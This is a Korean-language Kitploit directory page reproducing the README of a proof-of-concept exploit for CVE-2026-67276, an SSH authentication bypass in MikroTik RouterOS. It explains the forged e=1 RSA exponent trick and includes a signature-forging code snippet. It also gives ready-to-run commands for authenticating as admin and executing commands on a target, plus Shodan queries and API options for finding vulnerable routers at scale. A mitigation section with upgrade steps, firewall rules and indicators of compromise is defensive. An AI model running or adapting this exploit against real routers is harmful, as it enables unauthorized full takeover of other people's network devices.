Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
exploit-mikrotik-2026 — CVE-2026-67276 MikroTik RouterOS SSH 인증 우회 익스플로잇 | Kitploit
도구/GitHubGitHub/blackhatexploitation/exploit-mikrotik-2026
ReconnaissanceVulnerability AnalysisExploitationInformation GatheringNetwork SecurityPenetration TestingAuthentication
GitHubblackhatexploitation/exploit-mikrotik-2026

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

exploit-mikrotik-2026

CVE-2026-67276 MikroTik RouterOS SSH 인증 우회 익스플로잇

저장소 보기
8시간 16분 전아직 검토되지 않음

CVE-2026-67276 - MikroTrik SSH 인증 우회 익스플로잇

CVE Severity Type Platform

MikroTik RouterOS SSH 공개 키 인증 우회 - 개인 키 불필요

CVE-2026-67276(MikroTrick)에 대한 개념 증명 익스플로잇으로, MikroTik RouterOS SSH 구현의 치명적인 인증 우회 취약점으로 공격자가 개인 키를 소유하지 않고도 모든 사용자로 인증할 수 있게 해줍니다.


목차

  • 취약점 개요
  • 작동 원리
  • 영향받는 버전
  • 설치
  • 사용법
  • Shodan 정찰
  • 기술적 세부 사항
  • 해결 방안
  • 참고 자료
  • 면책 조항

취약점 개요

MikroTrick 공격 체인

CVE-2026-67276은 CERT PL이 "MikroTrick" 이라고 명명한 더 큰 공격 체인의 일부로, 실제 환경에서 활발히 악용되는 것이 관찰되었습니다:


작동 원리

취약점

RouterOS SSH 인증에는 공개 키 검증 방식에 치명적인 결함이 있습니다:

  1. 키 매칭 버그: RouterOS는 제시된 SSH 공개 키 블롭을 (키 유형, 모듈러스) 만 사용하여 인증된 키와 대조하며, 지수(exponent)를 완전히 생략합니다
  2. 클라이언트의 지수: 서명 검증은 저장된 키가 아닌 클라이언트가 제공한 블롭의 지수를 사용합니다
  3. 사소한 위조: {ssh-rsa, e=1, n=피해자_모듈러스}를 제시하면 검증이 사소해집니다

수학적 근거

root@kitploit:~
표준 RSA 검증:  sig^65537 mod n == 기대값  (개인 키 필요)
악용된 검증:     sig^1 mod n == sig           (개인 키 불필요!)

지수 e=1을 사용하면 서명 검증은 다음과 같이 됩니다:

root@kitploit:~
sig^1 mod n == sig

즉, "서명"은 단순히 EMSA-PKCS1-v1_5로 인코딩된 인증 데이터 자체입니다 - 피해자의 공개 모듈러스를 아는 사람이라면 누구나 구성할 수 있습니다.

공격 전제 조건

  1. 인증된 RSA 키가 있는 계정의 대상 사용자 이름
  2. 해당 인증 키의 RSA 공개 모듈러스 n (.pub 파일, 이전 연결 등에서 획득)
  3. SSH 포트에 대한 네트워크 접근

영향받는 버전

브랜치취약 범위패치 버전
6.x6.0 - 6.49.206.49.21+
7.x stable

설치

root@kitploit:~
# 저장소 복제
git clone https://github.com/BlackHatExploitation/exploit-mikrotik-2026.git
cd exploit-mikrotik-2026

# 의존성 설치
pip install paramiko cryptography

사용법

빠른 시작

root@kitploit:~
# 기본 익스플로잇 - 키 자동 생성, 버전 감지
python3 full_exploit.py --host 192.168.88.1 --username admin

# 인증 후 명령 실행
python3 full_exploit.py --host 192.168.88.1 --username admin --exec '/system resource print'

# 사용자 지정 포트
python3 full_exploit.py --host 192.168.88.1 --port 2222 --username admin

기존 공개 키 사용

root@kitploit:~
# 피해자의 공개 키 파일이 있는 경우
python3 full_exploit.py --host 192.168.88.1 --username admin --pubkey victim.pub

# 또는 모듈러스를 직접 제공
python3 full_exploit.py --host 192.168.88.1 --username admin --modulus-hex "00:ab:cd:..."

버전 감지

익스플로잇은 RouterOS 버전을 자동으로 감지하고 취약점 상태를 확인합니다:

root@kitploit:~
# MikroTik이 아니거나 알 수 없는 버전에서도 강제 실행
python3 full_exploit.py --host 192.168.88.1 --username admin --skip-version-check

모든 옵션

root@kitploit:~
--host              대상 RouterOS IP/호스트명 (필수)
--port              SSH 포트 (기본값: 22)
--username          대상 RouterOS 사용자 이름 (필수)
--pubkey            RSA 공개 키 파일 (제공되지 않으면 자동 생성)
--modulus-hex       RSA 모듈러스 16진수 (--pubkey의 대안)
--algos             서명 알고리즘 (기본값: ssh-rsa,rsa-sha2-256)
--exec              인증 후 실행할 명령
--exp-enc           지수 인코딩: canonical (1바이트) 또는 aligned (3바이트)
--timeout           연결 시간 초과 (기본값: 15.0초)
--skip-version-check    RouterOS 버전 검증 건너뛰기
--shodan-dorks      Shodan 검색 쿼리 출력
--shodan-search     대상 검색을 위한 Shodan API 검색
--shodan-key        Shodan API 키
--shodan-query      사용자 지정 Shodan 쿼리
--shodan-limit      Shodan 결과 제한 (기본값: 100)

Shodan 정찰

Dorks 출력

root@kitploit:~
python3 full_exploit.py --shodan-dorks

Shodan API 검색

root@kitploit:~
# 기본 검색
python3 full_exploit.py --shodan-search --shodan-key YOUR_API_KEY

# 사용자 지정 쿼리
python3 full_exploit.py --shodan-search --shodan-key YOUR_KEY --shodan-query 'MikroTik port:22 country:US'

유용한 Shodan 쿼리


기술적 세부 사항

SSH 공개 키 블롭 구조

root@kitploit:~
string    "ssh-rsa"
mpint     e (공개 지수)  <- 공격자가 e=1 제공
mpint     n (모듈러스)          <- 피해자의 실제 모듈러스

위조 서명 생성

root@kitploit:~
# "서명"은 단순히 EMSA-PKCS1-v1_5로 인코딩된 인증 데이터입니다
def forged_signature(data, sig_alg, n):
    k = (n.bit_length() + 7) // 8
    block = emsa_pkcs1_v15(data, sig_alg, k)
    return block  # e=1일 때 이것이 유효한 서명입니다

와이어 형식 참고 사항

  • 블롭의 내부 유형 문자열은 rsa-sha2-256/512 알고리즘에서도 ssh-rsa로 유지됩니다
  • 서명 알고리즘은 외부 알고리즘 필드에만 들어갑니다
  • 취약한 버전에서는 canonical(1바이트) 및 aligned(3바이트) e=1 인코딩 모두 작동합니다

출력 예시

root@kitploit:~
[*] CVE-2026-67276 MikroTrick 익스플로잇
[*] 대상: 192.168.88.1:22

[*] RouterOS 버전 감지 중...
[*] SSH 배너: SSH-2.0-ROSSSH-7.23.3
[*] RouterOS 버전: 7.23.3
[+] 취약한 버전 - CVE-2026-67276 적용됨

[*] 2048비트 RSA 키 쌍 생성 중...
[+] 개인 키 저장됨: /path/to/exploit_key
[+] 공개 키 저장됨:  /path/to/exploit_key.pub
[*] 모듈러스: 2048비트 | 위조된 e=1
[*] 지수 인코딩: canonical (01)

[*] rsa-sha2-256 시도 중 ...
[+] 'admin'으로 rsa-sha2-256을 통해 인증됨
[+] CVE-2026-67276 확인됨 - 대상이 취약함
--- 명령 출력 ---
                uptime: 14d23h45m12s
               version: 7.23.3 (stable)
            build-time: Sep/01/2026 12:00:00

해결 방안

1. 즉시 업그레이드

root@kitploit:~
# 현재 버전 확인
/system resource print

# 패치 버전으로 업그레이드
/system package update download
/system reboot

최소 안전 버전:

  • 6.x 브랜치: 6.49.21
  • 7.x stable: 7.23.4
  • 7.x testing: 7.24.2

2. 필요하지 않으면 SSH 비활성화

root@kitploit:~
/ip service disable ssh

3. SSH 접근 제한

root@kitploit:~
# IP 주소로 제한
/ip service set ssh address=192.168.88.0/24

# 방화벽 규칙
/ip firewall filter add chain=input dst-port=22 protocol=tcp \
    src-address=!192.168.88.0/24 action=drop

4. 침해 여부 확인

root@kitploit:~
# 의심스러운 사용자 확인
/user print

# "ops" 사용자 확인 (알려진 공격자 지표)
/user print where name=ops

# 장치 플래그 상태 확인
/system/device-mode/print

# 로그 확인
/log print where topics~"ssh"

알려진 IOCs:

  • 로그 항목: login failure for user -2 via ssh
  • 알 수 없는 권한 있는 사용자 ops
  • 장치 "Flagged" 표시
  • 공격자 IP: 82.192.72.4, 103.102.31.18

참고 자료

  • CERT PL 권고
  • CERT PL CVE 세부 정보
  • MikroTik 보안 공지
  • RFC 8017 - PKCS#1 v2.2
  • RFC 8332 - SSH에서 SHA-256/512와 RSA 키 사용
  • RFC 4252 - SSH 인증 프로토콜

면책 조항

⚠️ 이 도구는 공인된 보안 테스트 및 교육 목적으로만 제공됩니다.

  • 소유하거나 명시적 서면 허가를 받은 시스템에만 사용하십시오
  • 컴퓨터 시스템에 대한 무단 접근은 CFAA, Computer Misuse Act 및 전 세계의 유사 법률에 따라 불법입니다
  • 작성자는 이 도구로 인한 오용이나 손해에 대해 책임을 지지 않습니다
  • 이 도구를 사용함으로써 책임감 있고 합법적으로 사용하는 것에 동의하는 것입니다

라이선스

MIT 라이선스 - 자세한 내용은 LICENSE를 참조하십시오.


작성자

보안 연구 PoC - CVE-2026-67276 랩 구현

유용하다면 이 저장소에 Star를 눌러주세요!

도구 다운로드
세부 항목정보
CVE IDCVE-2026-67276
심각도치명적 (CVSS 9.8)
CWECWE-347 (암호화 서명의 부적절한 검증)
공격 벡터네트워크
인증불필요
복잡도낮음
영향장치 전체 장악
CVE유형설명
CVE-2026-67276인증 우회지수 위조를 통한 SSH 공개 키 인증 우회
CVE-2026-86060권한 상승사용자 이름을 통한 인자 주입
CVE-2026-67279인증 우회userauth 완료 없이 SSH 연결
CVE-2026-67277정보 노출bandwidth-test를 통한 커널 메모리 누수
CVE-2026-67278서명 우회X.509 잘못된 서명 수용
CVE-2026-67281파일 읽기jsproxy를 통한 WebFig 루트 파일 읽기
7.0 - 7.23.3
7.23.4+
7.x testing7.24.0 - 7.24.17.24.2+
대상쿼리
모든 MikroTikMikroTik
MikroTik SSHMikroTik port:22
Winbox 노출port:8291
WebFig 패널http.title:RouterOS
RouterOS 6.49.xMikroTik "6.49"
RouterOS 7.xMikroTik "RouterOS v7"
국가별MikroTik country:US
취약 버전 힌트MikroTik ("6.49" OR "7.23" OR "7.24.0")